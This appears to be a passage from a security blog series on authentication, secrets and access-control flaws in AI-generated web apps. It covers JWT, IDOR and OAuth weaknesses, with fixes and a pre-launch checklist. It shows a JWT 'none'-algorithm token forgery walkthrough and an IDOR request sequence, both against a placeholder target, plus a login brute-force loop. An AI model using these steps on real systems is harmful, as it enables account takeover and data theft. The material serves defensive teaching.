CREATE TABLE notes (
  id SERIAL PRIMARY KEY,
  user_id UUID REFERENCES auth.users,
  content TEXT
);
ALTER TABLE notes ENABLE ROW LEVEL SECURITY;

CREATE POLICY "Users can only access their own notes"
  ON notes FOR ALL
  USING (auth.uid() = user_id)
  WITH CHECK (auth.uid() = user_id);

Two statements, five lines of SQL. That’s the difference between “anyone can read your database” and “users can only see their own rows.” The AI skips ENABLE ROW LEVEL SECURITY and the policy because it doesn’t need them for the code to work. The Supabase anon key, which is designed to be public, often gets confused with the service_role key, which absolutely must not be public. The AI doesn’t know the difference. It uses whichever key makes the code work.

Why AI Does This

The AI optimizes for what you asked. “Add authentication to my app” means “show a login screen and protect the routes.” The AI delivers exactly that — on the frontend. It doesn’t spontaneously add server-side middleware, because you didn’t ask for middleware. It doesn’t implement RBAC, because you asked for authentication, not authorization. It produces the minimum viable implementation of what you described, and the minimum viable implementation of “authentication” is a client-side check.

This is the invisible decision surface from the Field Guide. The AI decided where to put the auth check, decided not to add server-side validation, decided to use the anon key instead of implementing proper RLS policies. The developer never saw any of those decisions. The app worked, so they moved on.
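
For contrast, this is roughly what the missing server-side decision looks like when it is written down. The sketch is framework-free and hypothetical: authorizeNoteAccess, the session shape, and the "admin" role are assumptions for illustration, and session stands for whatever the server derived from a verified token, never a value the client can edit.

```javascript
// Hypothetical server-side check. It returns the HTTP status the handler
// should respond with, based only on server-held data.
function authorizeNoteAccess(session, note) {
  if (!session || !session.userId) return { status: 401 }; // not authenticated
  if (!note) return { status: 404 };                       // nothing to access
  const isOwner = note.userId === session.userId;
  const isAdmin = session.role === 'admin';
  return isOwner || isAdmin ? { status: 200 } : { status: 403 };
}

const privateNote = { id: 42, userId: 'u-alice', content: 'private' };
console.log(authorizeNoteAccess(null, privateNote).status);                                // 401
console.log(authorizeNoteAccess({ userId: 'u-bob', role: 'user' }, privateNote).status);   // 403
console.log(authorizeNoteAccess({ userId: 'u-alice', role: 'user' }, privateNote).status); // 200
```

Hiding a button in React changes none of these outcomes; only a check like this, run on every request, does.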

What to Check

Open your browser’s network tab. Can you make API requests directly, bypassing the frontend? If your API returns data without validating a server-side session or token, your auth is client-side only. Test every endpoint — not just the ones the UI exposes. Try accessing admin endpoints as a regular user. Try accessing other users’ data by modifying IDs in requests. If any of these work, you have a client-side auth problem.


Pattern 3: Broken JWT & Session Management

The Standard Failures

JWT is the default auth mechanism for AI-generated code. The AI reaches for it because it’s stateless, well-documented, and appears in thousands of training examples. But the implementations are consistently broken in the same ways:

No expiration. The QuickNote example sets no expiresIn parameter. The token is valid forever. I see this in roughly half the vibe-coded applications I review — the AI generates the jwt.sign() call and doesn’t add the expiry option because the tutorial it learned from didn’t include one.

Weak or hardcoded signing secrets. “secret”, “my_jwt_secret”, “insecure_secret_key” — these show up verbatim in production applications. The AI pulls them from its training data, where they were placeholder values in documentation. A weak signing secret means anyone can forge tokens.

The “none” algorithm. The JWT specification defines an algorithm value called none for unsecured tokens: no signature at all, intended only for cases where the token’s integrity is already guaranteed by some other means. AI tools occasionally generate JWT implementations that accept the none algorithm, or that include it in an allowed algorithms array. Here’s how the attack works in practice:

# Step 1: Take a legitimate JWT and split it into its three parts (header.payload.signature)
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJ1c2VyIn0.signature_here"

# Step 2: Create a new header with alg set to "none"
echo -n '{"alg":"none","typ":"JWT"}' | base64 -w 0 | tr -d '=' | tr '/+' '_-'
# Output: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0

# Step 3: Modify the payload (e.g., change the username to admin)
echo -n '{"id":1,"username":"admin"}' | base64 -w 0 | tr -d '=' | tr '/+' '_-'
# Output: eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiJ9

# Step 4: Concatenate with an empty signature
FORGED="eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiJ9."

# Step 5: Use it
curl -H "Authorization: Bearer $FORGED" https://target.com/api/admin/users

Five commands. No secret needed. If the server accepts it, you have full admin access. The fix is to always specify the allowed algorithm explicitly in the verification call — jwt.verify(token, secret, { algorithms: ['HS256'] }) — so the server rejects any token that claims to use a different algorithm.
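
To show why pinning the algorithm defeats the forged token, here is a minimal HS256 signer and verifier built on Node’s crypto module. It is a teaching sketch under stated assumptions, not a replacement for a maintained JWT library: the function names are hypothetical, and expiry and other claim checks are deliberately left out.

```javascript
const crypto = require('node:crypto');

const b64url = (text) => Buffer.from(text).toString('base64url');

// Signs header.payload with HMAC-SHA256 (what "HS256" means).
function signHs256(payload, secret) {
  const head = b64url(JSON.stringify({ alg: 'HS256', typ: 'JWT' }));
  const body = b64url(JSON.stringify(payload));
  const sig = crypto.createHmac('sha256', secret).update(`${head}.${body}`).digest('base64url');
  return `${head}.${body}.${sig}`;
}

// Verifies a token while accepting exactly one algorithm.
// Returns the payload, or null for anything that does not check out.
function verifyHs256(token, secret) {
  const parts = token.split('.');
  if (parts.length !== 3) return null;
  const [head, body, sig] = parts;
  try {
    const header = JSON.parse(Buffer.from(head, 'base64url').toString('utf8'));
    if (!header || header.alg !== 'HS256') return null; // rejects "none" and anything else
    const expected = crypto.createHmac('sha256', secret).update(`${head}.${body}`).digest();
    const given = Buffer.from(sig, 'base64url');
    if (given.length !== expected.length) return null;
    if (!crypto.timingSafeEqual(given, expected)) return null;
    return JSON.parse(Buffer.from(body, 'base64url').toString('utf8'));
  } catch {
    return null; // malformed JSON in header or payload
  }
}

const signingKey = crypto.randomBytes(32);
const goodToken = signHs256({ id: 1, username: 'user' }, signingKey);
// The forged token from the walkthrough above: alg "none", empty signature.
const forgedToken = 'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiJ9.';

console.log(verifyHs256(goodToken, signingKey));   // { id: 1, username: 'user' }
console.log(verifyHs256(forgedToken, signingKey)); // null
```

The verifier never asks the token which algorithm to use. It decides that itself and treats any disagreement as a failure, which is the same property the algorithms option provides in jwt.verify.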

No token invalidation. AI-generated auth rarely implements token revocation, refresh token rotation, or session invalidation. If a user changes their password, their old tokens still work. If an admin needs to force-logout a user, there’s no mechanism to do it.
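
One common way to get revocation back without giving up JWTs entirely is to check two extra things after the signature: was the token issued before the user's last password change, and is its ID on a revocation list. The sketch below assumes tokens carry sub, iat, and jti claims and uses in-memory stand-ins for the database. All names here are hypothetical.

```javascript
// In-memory stand-ins for a users table and a revocation list.
const users = new Map([[42, { id: 42, passwordChangedAt: 0 }]]);
const revokedTokenIds = new Set();

// payload is an ALREADY VERIFIED JWT payload with sub, iat (seconds), and jti.
function isTokenStillValid(payload) {
  const user = users.get(payload.sub);
  if (!user) return false;
  if (revokedTokenIds.has(payload.jti)) return false;     // admin force-logout
  if (payload.iat < user.passwordChangedAt) return false; // issued before the last password change
  return true;
}

// Call this from the password-change handler.
function changePassword(userId, nowSeconds) {
  users.get(userId).passwordChangedAt = nowSeconds;
}
```

The trade-off is a lookup on every request, which is exactly the statelessness JWT was supposed to buy you. Note that iat has one-second resolution, so a token issued in the same second as the password change still passes this check.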

OAuth and Social Login: The Deceptive Shortcut

“Add Google login to my app” feels like the safe choice — let Google handle the hard parts. But AI-generated OAuth implementations introduce their own failures. The most common: missing the state parameter (which prevents CSRF attacks on the login flow), skipping PKCE (Proof Key for Code Exchange, now mandatory under OAuth 2.1), and storing access tokens client-side in JavaScript variables or localStorage where any XSS vulnerability can steal them.

The AI generates the OAuth flow that works in the happy path — user clicks “Sign in with Google,” gets redirected, comes back authenticated. But the security properties of OAuth depend on implementation details that the AI consistently omits, because the tutorials it trained on omit them too.
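
The two pieces the AI tends to leave out are small. Here is a rough sketch of generating a state value and a PKCE verifier/challenge pair with Node's crypto module. The function names are mine, and where you store the state and verifier (a server-side session, typically) is up to your framework.

```javascript
const crypto = require('node:crypto');

// Unguessable value; store it server-side before redirecting to the provider.
function createState() {
  return crypto.randomBytes(16).toString('base64url');
}

// PKCE code_verifier: 32 random bytes, base64url-encoded (43 characters).
function createCodeVerifier() {
  return crypto.randomBytes(32).toString('base64url');
}

// PKCE S256 code_challenge: base64url(SHA-256(code_verifier)).
function codeChallengeFor(verifier) {
  return crypto.createHash('sha256').update(verifier).digest().toString('base64url');
}

// On the callback, compare the returned state with the stored one.
function stateMatches(stored, returned) {
  const a = Buffer.from(String(stored));
  const b = Buffer.from(String(returned));
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}
```

The challenge goes in the authorization request with code_challenge_method=S256; the verifier stays on your side until the token exchange. If stateMatches returns false on the callback, abort the login.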

The Compounding Problem

These failures compound. A token that never expires, signed with a guessable secret, using a library that accepts the none algorithm — that’s not one vulnerability, it’s an open door with the key taped to the frame. And because JWT is stateless by design, there’s no server-side session to inspect or revoke. The token is the session. If the token is compromised, the session is compromised until the signing secret itself is rotated, which invalidates every active session for every user.

What to Check

Decode one of your JWTs at jwt.io. Does it have an exp claim? If not, your tokens never expire. Check your signing secret — is it a short, guessable string, or a properly generated key? Test whether your API accepts tokens signed with the none algorithm. And check whether changing a user’s password invalidates their existing tokens.
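
If you would rather not paste a live token into a website, the same inspection takes a few lines of Node. This is a sketch under the assumption that the token is a standard three-part JWT; inspectJwt is a hypothetical helper, and it decodes without verifying anything, so use it for inspection only.

```javascript
// Decodes a JWT WITHOUT verifying the signature and lists obvious problems.
function inspectJwt(token) {
  const [header, payload] = token
    .split('.')
    .slice(0, 2)
    .map((part) => JSON.parse(Buffer.from(part, 'base64url').toString('utf8')));

  const findings = [];
  if (String(header.alg).toLowerCase() === 'none') {
    findings.push('alg is none: token is unsigned');
  }
  if (typeof payload.exp !== 'number') {
    findings.push('no exp claim: token never expires');
  } else if (payload.exp * 1000 < Date.now()) {
    findings.push('token is already expired');
  }
  return { header, payload, findings };
}
```

Run against the sample token from the none-algorithm walkthrough, it reports the missing exp claim.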


Pattern 4: Missing Access Controls — When Everyone Is Admin

The Pattern

Even when AI gets authentication right — user can log in, token is validated server-side, session has an expiration — it almost never implements proper authorization. Authentication answers “who are you?” Authorization answers “what are you allowed to do?” AI handles the first question. It ignores the second.

The typical AI-generated app has two roles: logged in and not logged in. That’s it. No admin vs. regular user distinction. No resource-level permissions. No row-level access controls beyond basic “your user ID matches the record’s user ID” checks — and even those are inconsistent.

Insecure Direct Object References (IDOR)

This is the most common access control failure in vibe-coded apps. The API puts sequential integer IDs in its paths (/api/notes/1, /api/notes/2, /api/users/42/notes), and the AI generates endpoints that fetch records by ID without verifying that the requesting user owns that record. Here’s the full attack:

# Authenticate as User A (user ID: 42)
TOKEN=$(curl -s -X POST https://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"email":"usera@test.com","password":"password123"}' \
  | jq -r '.token')

# Access User A's own notes — the endpoint fetches notes by user ID
curl -H "Authorization: Bearer $TOKEN" https://target.com/api/users/42/notes
# {"notes": [{"id": 101, "content": "User A's private note"}]}

# Now request User B's notes (user ID: 43) — same token, different user ID in the URL
curl -H "Authorization: Bearer $TOKEN" https://target.com/api/users/43/notes
# {"notes": [{"id": 205, "content": "User B's private note"}]}  ← IDOR

Three requests. User A’s token gives access to User B’s notes because the endpoint checks authentication (“is this a valid token?”) but not authorization (“does this token belong to user 43?”). The user ID in the URL controls whose data is returned, and the server never verifies it matches the authenticated user.
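
The missing check is a single comparison. Here is a framework-free sketch of the handler logic, using in-memory data that mirrors the IDs in the walkthrough. getUserNotes and the response shape are hypothetical; in a real app authUser would come from your verified token and requestedUserId from the route parameter.

```javascript
// Hypothetical in-memory data mirroring the example above.
const notesByUser = new Map([
  [42, [{ id: 101, content: "User A's private note" }]],
  [43, [{ id: 205, content: "User B's private note" }]],
]);

// authUser: identity taken from the verified token (never from the URL).
// requestedUserId: the ID taken from the URL path.
function getUserNotes(authUser, requestedUserId) {
  if (!authUser) {
    return { status: 401, body: { error: 'unauthenticated' } };
  }
  // The authorization step the vulnerable endpoint skips.
  if (authUser.id !== Number(requestedUserId)) {
    return { status: 403, body: { error: 'forbidden' } };
  }
  return { status: 200, body: { notes: notesByUser.get(authUser.id) ?? [] } };
}
```

A simpler design drops the user ID from the URL altogether (something like /api/me/notes) so there is nothing for the client to tamper with.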

The QuickNote app actually gets this one partially right: it scopes the notes query by userId. But many AI-generated apps don’t. And QuickNote has no update or delete endpoints at all, which is a gap in itself. When someone prompts the AI to add them later, nothing guarantees the new handlers will carry the same ownership check, and a user who knows a note ID could then modify or delete someone else’s notes.

Real Case: The Lovable BOLA Breach

In April 2026, security researchers disclosed a Broken Object Level Authorization (BOLA) vulnerability in Lovable — the $6.6 billion vibe coding platform. The /projects/{id}/* API endpoints verified Firebase authentication tokens but skipped ownership checks entirely. Five API calls from a free account were enough to access any other user’s source code, database credentials, AI chat histories, and customer data. Every project created before November 2025 was exposed. Researchers found data from employees at Nvidia, Microsoft, Uber, and Spotify in the accessible projects.

This is Pattern 4 in its purest form. Authentication worked — you needed a valid Firebase token. Authorization was absent — that valid token let you read anyone’s data. The platform left the vulnerability open for 48 days after the initial bug report, closed follow-up reports as duplicates, and initially called the exposed data “intentional behavior.”

The Lovable breach is worth studying because it didn’t happen in someone’s side project. It happened in the platform itself — the tool that millions of vibe coders trust to generate their applications. If the platform can’t get authorization right, what are the odds the apps built on it will?

Why AI Misses This

Authorization is inherently contextual. It depends on business logic — who should see what, who can edit what, what actions require elevated privileges. The AI can’t infer your business rules from a prompt like “build a note-taking app.” It gives you the simplest working implementation: authenticated users can access their own data. Anything more complex — admin roles, team-based access, shared resources with granular permissions — requires explicit design that the vibe coder never specified.
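
Writing the rules down explicitly can be as simple as a table of actions and predicates. The roles, actions, and note shape below are invented for a note-taking app and are only a sketch; the point is that every rule is something a human decided, and anything not listed is denied.

```javascript
// Hypothetical rules for a note-taking app; your business logic will differ.
const RULES = new Map([
  ['note:read', (user, note) => note.ownerId === user.id || note.sharedWith.includes(user.id)],
  ['note:update', (user, note) => note.ownerId === user.id],
  ['note:delete', (user, note) => note.ownerId === user.id || user.role === 'admin'],
]);

// Deny by default: missing users and unknown actions are refused.
function can(user, action, resource) {
  const rule = RULES.get(action);
  if (!user || !rule) return false;
  return rule(user, resource);
}
```

A handler then calls can(user, 'note:update', note) before touching the record and returns 403 when it comes back false.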

This is one of the places where the gap between “working app” and “secure app” is widest. The app works for every user in isolation. It only breaks when one user tries to access another’s data — a test case that vibe coders almost never run, because they’re testing their own features, not testing against other users.

What to Check

Log in as User A. Try to access User B’s resources by manipulating IDs, parameters, or API paths. If any cross-user access succeeds, you have IDOR. Check whether admin endpoints require an admin role or just a valid token. Check whether sensitive operations (delete account, change email, export data) have additional authorization requirements beyond basic authentication.


The Auth & Secrets Checklist

Run this against your vibe-coded application before you ship. Every item maps back to a pattern above.

Secrets:

  1. No API keys, tokens, or credentials in source code — run gitleaks detect --source . or trufflehog filesystem .
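  2. All secrets loaded from environment variables or a secrets manager: grep -rniE "(sk-[a-z0-9]|(key|secret|password)[a-z_]*['\"]?[[:space:]]*[:=][[:space:]]*['\"])" src/ flags sk- style keys and string literals assigned to names containing key, secret, or password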
  3. Frontend JavaScript contains zero secrets — inspect your built bundle: grep -r "API_KEY\|SECRET\|Bearer" dist/
  4. .env files are in .gitignore — verify they’ve never been committed: git log --all --diff-filter=A -- '*.env'
  5. Database credentials use least-privilege accounts — not the root/admin connection string

Authentication:

  1. All auth checks enforced server-side — curl -X GET https://yourapp.com/api/protected without a token. If it returns data, your auth is broken
  2. Passwords hashed with bcrypt or Argon2, not MD5 or SHA-256 (fast hashes can be brute-forced even when salted)
  3. JWT tokens include exp claim — decode your token at jwt.io and check the payload
  4. JWT signing secret is at least 256 bits of randomness — node -e "console.log(require('crypto').randomBytes(32).toString('hex'))" generates a proper one
  5. Login endpoint has rate limiting: for i in $(seq 1 100); do curl -s -o /dev/null -w "%{http_code}\n" -X POST https://yourapp.com/api/login -H "Content-Type: application/json" -d '{"email":"test@test.com","password":"wrong"}'; done. If you never get a 429, you have no rate limiting

Authorization:

  1. Every API endpoint checks user permissions — not just authentication
  2. Resource access verifies ownership: log in as User A, then run curl -H "Authorization: Bearer $TOKEN" https://yourapp.com/api/resources/ with User A’s token in $TOKEN and one of User B’s resource IDs appended to the path. If it returns User B’s data, you have IDOR
  3. Admin functions require admin role — test admin endpoints with a regular user’s token
  4. Sensitive operations require re-authentication or step-up verification

OAuth (if using social login):

  1. OAuth flow includes state parameter for CSRF protection
  2. PKCE is enabled (check for code_verifier and code_challenge in the auth request)
  3. Access tokens are stored server-side, not in localStorage or JavaScript variables

Session Management:

  1. Tokens expire within a reasonable window (hours, not never)
  2. Password changes invalidate existing sessions
  3. A mechanism exists to force-revoke compromised tokens

This isn’t a complete security assessment. But if your vibe-coded app fails any of these 20 items, you have a critical vulnerability that needs fixing before launch. I’ll expand this into a full founder’s checklist in Part 8 of this series.
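
For the login rate-limiting item in particular, the fix does not have to be elaborate. Here is a minimal fixed-window sketch keyed by IP or email. createLoginLimiter, its defaults, and the in-memory Map are my assumptions; a multi-instance deployment would need shared storage instead.

```javascript
// Fixed-window limiter: at most `limit` attempts per key per `windowMs`.
function createLoginLimiter({ limit = 5, windowMs = 15 * 60 * 1000 } = {}) {
  const attempts = new Map(); // key -> { count, windowStart }

  // Returns true if the attempt is allowed, false if it should get a 429.
  return function isAllowed(key, now = Date.now()) {
    const entry = attempts.get(key);
    if (!entry || now - entry.windowStart >= windowMs) {
      attempts.set(key, { count: 1, windowStart: now });
      return true;
    }
    entry.count += 1;
    return entry.count <= limit;
  };
}
```

Call it at the top of the login handler, before the password comparison, and respond with 429 when it returns false. The curl loop in the checklist should then start printing 429 after the first few attempts.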


What You Should Take From This

The QuickNote demo is 67 lines. Your app is probably thousands. Every line of AI-generated authentication code carries the same risks I showed here — hardcoded secrets, client-side checks, broken sessions, missing access controls. The Lovable breach proved this isn’t theoretical. The Enrichlead founder from Part 3 thought he’d review security later. He was shutting down within a week.

Run the checklist above today, not after launch. Every jwt.sign() call, every password hash, every auth middleware the AI produces needs a manual look — is this check happening on the server, is this secret externalized, does this token expire, does this endpoint verify authorization and not just authentication? Those questions take seconds per function, and they’re the difference between a working demo and a secure application.

At VULNEX, auth issues appear in virtually every vibe-coded application we review — and they’re almost always the highest-severity findings. My workflow: run Gitleaks against the repo, check the frontend bundle for exposed keys, test every API endpoint without the frontend, decode the JWTs. I run dependencies through npmscan and cross-reference with Snyk’s vulnerability database — the auth-related libraries are always the first I check.

The AI will build you a login screen that looks professional and works in a demo. Getting it to build authentication that holds up against an actual attacker requires human judgment and the discipline to review before you ship.

As always: trust nothing, verify everything.

